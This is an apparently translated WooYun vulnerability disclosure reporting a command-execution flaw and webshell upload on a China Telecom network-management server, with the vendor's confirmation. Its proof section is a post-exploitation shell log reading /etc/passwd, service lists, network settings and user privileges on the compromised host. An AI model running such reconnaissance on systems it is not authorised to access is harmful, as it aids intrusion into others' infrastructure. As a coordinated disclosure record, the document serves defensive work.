
Vulnerability Summary

Defect ID: wooyun-2015-0160648

Vulnerability title: Getshell on a server of a China Telecom Corporation Limited system

Related vendor: China Telecom (中国电信)

Vulnerability author: 朱元璋

Submitted: 2015-12-12 10:56

Fixed: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: system/service patches not applied in time

Severity: High

Self-assessed Rank: 15

Vulnerability status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-12: Details sent to the vendor; awaiting vendor processing
2015-12-16: Vendor has confirmed; details disclosed to the vendor only
2015-12-26: Details disclosed to core white hats and relevant domain experts
2016-01-05: Details disclosed to regular white hats
2016-01-15: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

Detailed description:



The URL http://**.**.**.**:59009/VIPNMS/login.action has a command execution vulnerability.



Uploaded a webshell directly to the server.


Proof of vulnerability:

[/inm/nmsapp/opt/tomcat/tomcat3/webapps/VIPNMS/VIPNMS/]$ chkconfig --list
NetworkManager 0:off 1:off 2:off 3:off 4:off 5:off 6:off
abrt-ccpp 0:off 1:off 2:off 3:off 4:off 5:off 6:off
abrt-oops 0:off 1:off 2:off 3:off 4:off 5:off 6:off
abrtd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
acpid 0:off 1:off 2:off 3:off 4:off 5:off 6:off
atd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
auditd 0:off 1:off 2:on 3:on 4:on 5:off 6:off
autofs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
avahi-daemon 0:off 1:off 2:off 3:off 4:off 5:off 6:off
bluetooth 0:off 1:off 2:off 3:off 4:off 5:off 6:off
certmonger 0:off 1:off 2:off 3:off 4:off 5:off 6:off
cgconfig 0:off 1:off 2:on 3:on 4:on 5:on 6:off
cgred 0:off 1:off 2:off 3:off 4:off 5:off 6:off
cpuspeed 0:off 1:on 2:off 3:off 4:off 5:off 6:off
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
cups 0:off 1:off 2:off 3:off 4:off 5:off 6:off
dnsmasq 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ebtables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
firstboot 0:off 1:off 2:off 3:off 4:off 5:off 6:off
haldaemon 0:off 1:off 2:off 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ip6tables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
iptables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
irqbalance 0:off 1:off 2:off 3:on 4:on 5:on 6:off
iscsi 0:off 1:off 2:off 3:on 4:on 5:on 6:off
iscsid 0:off 1:off 2:off 3:on 4:on 5:on 6:off
kdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ksm 0:off 1:off 2:off 3:on 4:on 5:on 6:off
ksmtuned 0:off 1:off 2:off 3:on 4:on 5:on 6:off
libvirt-guests 0:off 1:off 2:on 3:on 4:on 5:on 6:off
libvirtd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
lvm2-monitor 0:off 1:on 2:on 3:on 4:on 5:on 6:off
matahari-broker 0:off 1:off 2:off 3:off 4:off 5:off 6:off
matahari-host 0:off 1:off 2:off 3:off 4:off 5:off 6:off
matahari-network 0:off 1:off 2:off 3:off 4:off 5:off 6:off
matahari-service 0:off 1:off 2:off 3:off 4:off 5:off 6:off
matahari-sysconfig 0:off 1:off 2:off 3:off 4:off 5:off 6:off
mdmonitor 0:off 1:off 2:off 3:off 4:off 5:off 6:off
messagebus 0:off 1:off 2:on 3:on 4:on 5:on 6:off
netconsole 0:off 1:off 2:off 3:off 4:off 5:off 6:off
netfs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
nfs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
nfslock 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ntpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ntpdate 0:off 1:off 2:off 3:off 4:off 5:off 6:off
oddjobd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
portreserve 0:off 1:off 2:on 3:on 4:on 5:on 6:off
postfix 0:off 1:off 2:off 3:off 4:off 5:off 6:off
psacct 0:off 1:off 2:off 3:off 4:off 5:off 6:off
qpidd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
quota_nld 0:off 1:off 2:off 3:off 4:off 5:off 6:off
radvd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rdisc 0:off 1:off 2:off 3:off 4:off 5:off 6:off
restorecond 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rhnsd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
rhsmcertd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rpcbind 0:off 1:off 2:on 3:on 4:on 5:on 6:off
rpcgssd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rpcidmapd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rpcsvcgssd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rsyslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
salt-minion 0:off 1:off 2:on 3:on 4:on 5:on 6:off
saslauthd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
smartd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
snmpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
snmptrapd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
spice-vdagentd 0:off 1:off 2:off 3:off 4:off 5:on 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
sssd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sysstat 0:off 1:on 2:on 3:on 4:on 5:on 6:off
udev-post 0:off 1:on 2:on 3:on 4:on 5:on 6:off
virt-who 0:off 1:off 2:on 3:on 4:on 5:on 6:off
vmware-tools 0:off 1:off 2:on 3:on 4:on 5:on 6:off
wdaemon 0:off 1:off 2:off 3:off 4:off 5:off 6:off
wpa_supplicant 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ypbind 0:off 1:off 2:off 3:off 4:off 5:off 6:off
/bin/sh: line 0: cd: /inm/nmsapp/opt/tomcat/tomcat3/webapps/VIPNMS/VIPNMS/: No such file or directory
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:497:496:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
pulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
ctinm:x:500:500:ctinm:/home/ctinm:/bin/bash
ultrainm:x:901:900::/home/ultrainm:/bin/bash
nmsapp:x:902:902::/inm/nmsapp:/bin/bash
patrol:x:911:900::/home/patrol:/bin/bash
ctsi:x:920:920::/inm/ctsi:/bin/bash
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ ifconfig
eth1 Link encap:Ethernet HWaddr 02:00:74:55:00:22
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::74ff:fe55:22/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:155790146 errors:0 dropped:0 overruns:0 frame:0
TX packets:79493301 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:85258288251 (79.4 GiB) TX bytes:18338520710 (17.0 GiB)
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:129344319 errors:0 dropped:0 overruns:0 frame:0
TX packets:129344319 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6468625231 (6.0 GiB) TX bytes:6468625231 (6.0 GiB)
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ cat /etc/resolv.conf
# Generated by NetworkManager
# No nameservers found; try putting DNS servers into your
# ifcfg files in /etc/sysconfig/network-scripts like so:
#
# DNS1=xxx.xxx.xxx.xxx
# DNS2=xxx.xxx.xxx.xxx
# DOMAIN=**.**.**.** **.**.**.**
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ bash prompt:
bash: prompt:: No such file or directory
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ lsb_release -a
LSB Version: :core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID: RedHatEnterpriseServer
Description: Red Hat Enterprise Linux Server release 6.2 (Santiago)
Release: 6.2
Codename: Santiago
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ uname -a
Linux inmlcntest01 2.6.32-220.el6.x86_64 #1 SMP Wed Nov 9 08:03:13 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ id
uid=902(nmsapp) gid=902(nmsapp) groups=902(nmsapp),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$

Fix recommendation:

Strengthen security awareness.

Copyright notice: when reposting, please cite the source: 朱元璋@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmation time: 2015-12-16 19:08

Vendor reply:

CNVD confirmed and reproduced the reported situation; it has been forwarded via CNCERT to China Telecom Group, which will coordinate follow-up handling with the website management department.

Latest status:

None yet